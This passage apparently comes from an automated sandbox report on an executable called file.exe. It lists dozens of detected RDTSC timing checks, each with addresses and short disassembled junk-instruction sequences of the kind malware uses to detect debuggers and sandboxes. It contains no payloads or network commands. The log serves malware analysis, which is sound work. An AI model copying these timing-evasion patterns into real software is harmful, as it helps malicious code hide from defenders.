                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B826B7 second address: B826F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A80B11C47h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007F4A80B11C47h 0x00000012 push eax 0x00000013 push edx 0x00000014 jne 00007F4A80B11C36h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B826F5 second address: B82717 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4A81237CD7h 0x0000000b push esi 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B808BE second address: B808D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F4A80B11C45h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B808D8 second address: B808E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F4A81237CC6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B808E2 second address: B8091A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F4A80B11C3Ah 0x0000000e jmp 00007F4A80B11C3Dh 0x00000013 js 00007F4A80B11C45h 0x00000019 jmp 00007F4A80B11C3Fh 0x0000001e push esi 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B81094 second address: B8109A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B815B2 second address: B815BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B815BA second address: B815BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8187D second address: B81883 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B81883 second address: B818BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007F4A81237CD8h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jmp 00007F4A81237CCEh 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push edx 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 jo 00007F4A81237CC6h 0x0000001f pop edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B818BF second address: B818C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B82425 second address: B8242B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8242B second address: B8242F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8242F second address: B82433 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACF89A second address: ACF89E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACF89E second address: ACF8EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A81237CD4h 0x00000007 jns 00007F4A81237CE4h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F4A81237CD3h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACF8EF second address: ACF8FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4A80B11C3Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B857F0 second address: B857F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B857F8 second address: B857FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B857FE second address: B8582E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4A81237CD6h 0x00000011 push eax 0x00000012 push edx 0x00000013 jc 00007F4A81237CC6h 0x00000019 jno 00007F4A81237CC6h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8582E second address: B85843 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F4A80B11C3Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B85984 second address: B8598A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B85AE4 second address: B85B1B instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4A80B11C36h 0x00000008 jmp 00007F4A80B11C49h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pushad 0x00000011 jmp 00007F4A80B11C3Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B85B1B second address: B85B1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B85B1F second address: B85B23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B85B23 second address: B85B33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a jnc 00007F4A81237CC6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B85B33 second address: B85B37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B85C97 second address: B85C9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B85C9B second address: B85C9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B85E30 second address: B85E34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B85E34 second address: B85E38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B85E38 second address: B85E3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B85E3E second address: B85E51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a push edi 0x0000000b pop edi 0x0000000c je 00007F4A80B11C36h 0x00000012 pop esi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B85E51 second address: B85E69 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4A81237CC8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4A81237CCCh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B85E69 second address: B85E7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A80B11C3Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B85FB1 second address: B85FB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8616C second address: B86176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F4A80B11C36h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B86176 second address: B86190 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A81237CD6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B86320 second address: B8632A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8632A second address: B86330 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B921A1 second address: B921B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007F4A80B11C40h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B921B6 second address: B921BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B92326 second address: B92350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F4A80B11C36h 0x0000000a jo 00007F4A80B11C36h 0x00000010 jmp 00007F4A80B11C49h 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B92617 second address: B92629 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F4A81237CCDh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B92901 second address: B9290E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 jns 00007F4A80B11C36h 0x0000000c pop ecx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9290E second address: B92919 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jng 00007F4A81237CC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9317B second address: B9319F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jng 00007F4A80B11C36h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pushad 0x00000012 popad 0x00000013 pop edi 0x00000014 pushad 0x00000015 jnc 00007F4A80B11C36h 0x0000001b pushad 0x0000001c popad 0x0000001d jnp 00007F4A80B11C36h 0x00000023 popad 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9BA0D second address: B9BA15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9B740 second address: B9B750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007F4A80B11C36h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9B750 second address: B9B754 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9B754 second address: B9B760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop ebx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9B760 second address: B9B765 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA743A second address: BA743E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA743E second address: BA744F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jc 00007F4A81237CC6h 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA744F second address: BA7455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA6ECB second address: BA6EDB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007F4A81237CC6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA6FEC second address: BA6FF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA9590 second address: BA95A7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pushad 0x00000007 jno 00007F4A81237CC6h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA95A7 second address: BA95DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F4A80B11C36h 0x0000000a jmp 00007F4A80B11C41h 0x0000000f jmp 00007F4A80B11C48h 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA95DB second address: BA95E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F4A81237CC6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB807C second address: BB8086 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4A80B11C36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB8086 second address: BB808C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB808C second address: BB8093 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBAEE8 second address: BBAEFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jl 00007F4A81237CC6h 0x0000000c jnl 00007F4A81237CC6h 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBAEFB second address: BBAF13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4A80B11C44h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBE077 second address: BBE07B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBE07B second address: BBE07F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBE07F second address: BBE085 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBE085 second address: BBE091 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F4A80B11C36h 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC362E second address: BC3634 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC3634 second address: BC3658 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F4A80B11C36h 0x0000000e jmp 00007F4A80B11C46h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC3658 second address: BC365C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC365C second address: BC3662 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC3662 second address: BC3671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007F4A81237CC6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC3671 second address: BC3675 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC393B second address: BC394B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4A81237CC6h 0x00000008 jg 00007F4A81237CC6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC3BE5 second address: BC3C21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push edi 0x00000006 pop edi 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a jbe 00007F4A80B11C42h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 js 00007F4A80B11C51h 0x00000019 jmp 00007F4A80B11C45h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCD41A second address: BCD420 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCD420 second address: BCD426 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD8D31 second address: BD8D3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD8D3E second address: BD8D44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD8BF6 second address: BD8C01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE5E7B second address: BE5E7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE5E7F second address: BE5E98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4A813E4E71h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE5E98 second address: BE5EBE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a push ebx 0x0000000b jmp 00007F4A80BFB622h 0x00000010 push edi 0x00000011 pop edi 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 push edi 0x00000018 pop edi 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE1F05 second address: AE1F09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE1F09 second address: AE1F15 instructions: 0x00000000 rdtsc 0x00000002 je 00007F4A80BFB616h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF8145 second address: BF8151 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F4A813E4E66h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF8151 second address: BF8178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F4A80BFB61Fh 0x0000000b jmp 00007F4A80BFB61Eh 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF8178 second address: BF817E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF71CA second address: BF71E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 jnc 00007F4A80BFB616h 0x0000000d pop edx 0x0000000e jng 00007F4A80BFB61Eh 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF760F second address: BF7614 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF7614 second address: BF763E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4A80BFB626h 0x00000009 jmp 00007F4A80BFB620h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF763E second address: BF7642 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF7642 second address: BF7650 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F4A80BFB616h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF7650 second address: BF7654 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF7CD4 second address: BF7CF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 jmp 00007F4A80BFB627h 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF7E2B second address: BF7E4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F4A813E4E79h 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF7E4E second address: BF7E53 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFAB2C second address: BFAB30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFAB30 second address: BFAB36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
